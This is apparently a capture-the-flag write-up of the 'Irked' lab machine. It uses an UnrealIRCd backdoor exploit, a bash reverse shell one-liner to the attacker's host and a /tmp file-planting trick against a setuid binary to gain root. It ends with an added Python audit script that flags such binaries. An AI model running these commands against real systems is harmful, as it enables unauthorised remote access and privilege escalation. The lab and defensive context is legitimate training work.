Irked is based on ircd. It was fun while it lasted, but it took me a lot of time to solve. We will start with nmap, as always.
First, I checked port 80.
IRC is almost working. That’s the first clue right there. We will try another method to confirm this.
Time to attack IRC. After searching and going through some exploits, I found something that really worked.
https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor is the perfect exploit. He actually rewrote the whole thing with Python, and he has done a great job. I downloaded the script and edited it.
You have to provide your IP address. I made a mistake while editing that gave me a lot of trouble. My actual IP was 10.10.14.4, but I wrote 3 there and it didn’t work properly. After a while I checked it again and changed it. I make mistakes, and yes, I make a lot of mistakes.
We need to make sure netcat is listening on port 4444.
python3 exploit.py -payload netcat 10.10.10.117 6697
And this happens. I do not have permission to view the file. Now I’m mad. After countless hours of waiting, this is what happens. I needed a better shell, so I forwarded the shell.
bash -i >& /dev/tcp/10.10.14.4/4443 0>&1
Now we have a better shell. At least that’s what I think.
OK, I missed one screenshot, which actually shows that there was a .backup file that said something about steg.
I guess that means there was something hidden in that stupid-looking picture on the website. But right now I’m not bothered about it since I have a shell. Maybe this is the long way and that might have been a shortcut. You’re more than welcome to try it, but I won’t try it.
I was poking around hoping that I might find something, and I did. How lucky can I be?
And we all know /usr/bin/viewuser is not something normal. Let’s continue to explore the wonders of viewuser.
First thing: the file in the tmp folder is missing. Good for us. I missed another screenshot, which shows that the file executes with root privileges. Better luck next time. So we create a file called listusers and use a one-liner shell script to call for a root shell. It’s purely evil.
echo '/bin/bash' > /tmp/listusers
Now we give execute rights to everyone.
Time to call the script.
And there you have it. It’s all done.
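A defender-side check for the weakness used above, where a binary running with root privileges calls a file in /tmp: this added example (not part of the original write-up) scans setuid/setgid files for embedded paths in world-writable directories. It assumes the privilege comes from the setuid bit; the directory list, function names and sample bytes are constructed for illustration.

```python
import os
import re
import stat

# Directories any local user can normally write to (assumed list; extend per host).
WORLD_WRITABLE_PREFIXES = (b"/tmp/", b"/var/tmp/", b"/dev/shm/")

# Runs of 4+ printable ASCII bytes, the same idea as strings(1).
_PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")
# An absolute path token inside a printable run.
_PATH = re.compile(rb"/[\w./+-]+")

def risky_paths(blob: bytes) -> list[str]:
    """Return paths embedded in a binary that live in world-writable directories."""
    found = []
    for run in _PRINTABLE.findall(blob):
        for path in _PATH.findall(run):
            if path.startswith(WORLD_WRITABLE_PREFIXES) and path.decode() not in found:
                found.append(path.decode())
    return found

def is_privileged(mode: int) -> bool:
    """True for a regular file with the setuid or setgid bit set."""
    return stat.S_ISREG(mode) and bool(mode & (stat.S_ISUID | stat.S_ISGID))

def audit(root: str = "/usr") -> dict[str, list[str]]:
    """Walk root and map each setuid/setgid file to the risky paths it embeds."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                if not is_privileged(os.lstat(full).st_mode):
                    continue
                with open(full, "rb") as fh:
                    hits = risky_paths(fh.read())
            except OSError:
                continue  # unreadable or vanished file: skip it
            if hits:
                report[full] = hits
    return report

# Constructed sample: bytes shaped like a binary's string table, not a real dump.
SAMPLE = b"\x7fELF\x00\x01setuid\x00/tmp/listusers\x00who\x00/usr/bin/env\x00"

if __name__ == "__main__":
    for binary, paths in audit().items():
        print(binary, "->", ", ".join(paths))
```

Any hit is a candidate for review: a privileged program should call helpers by absolute path in a root-owned directory, never from a location other users can write to.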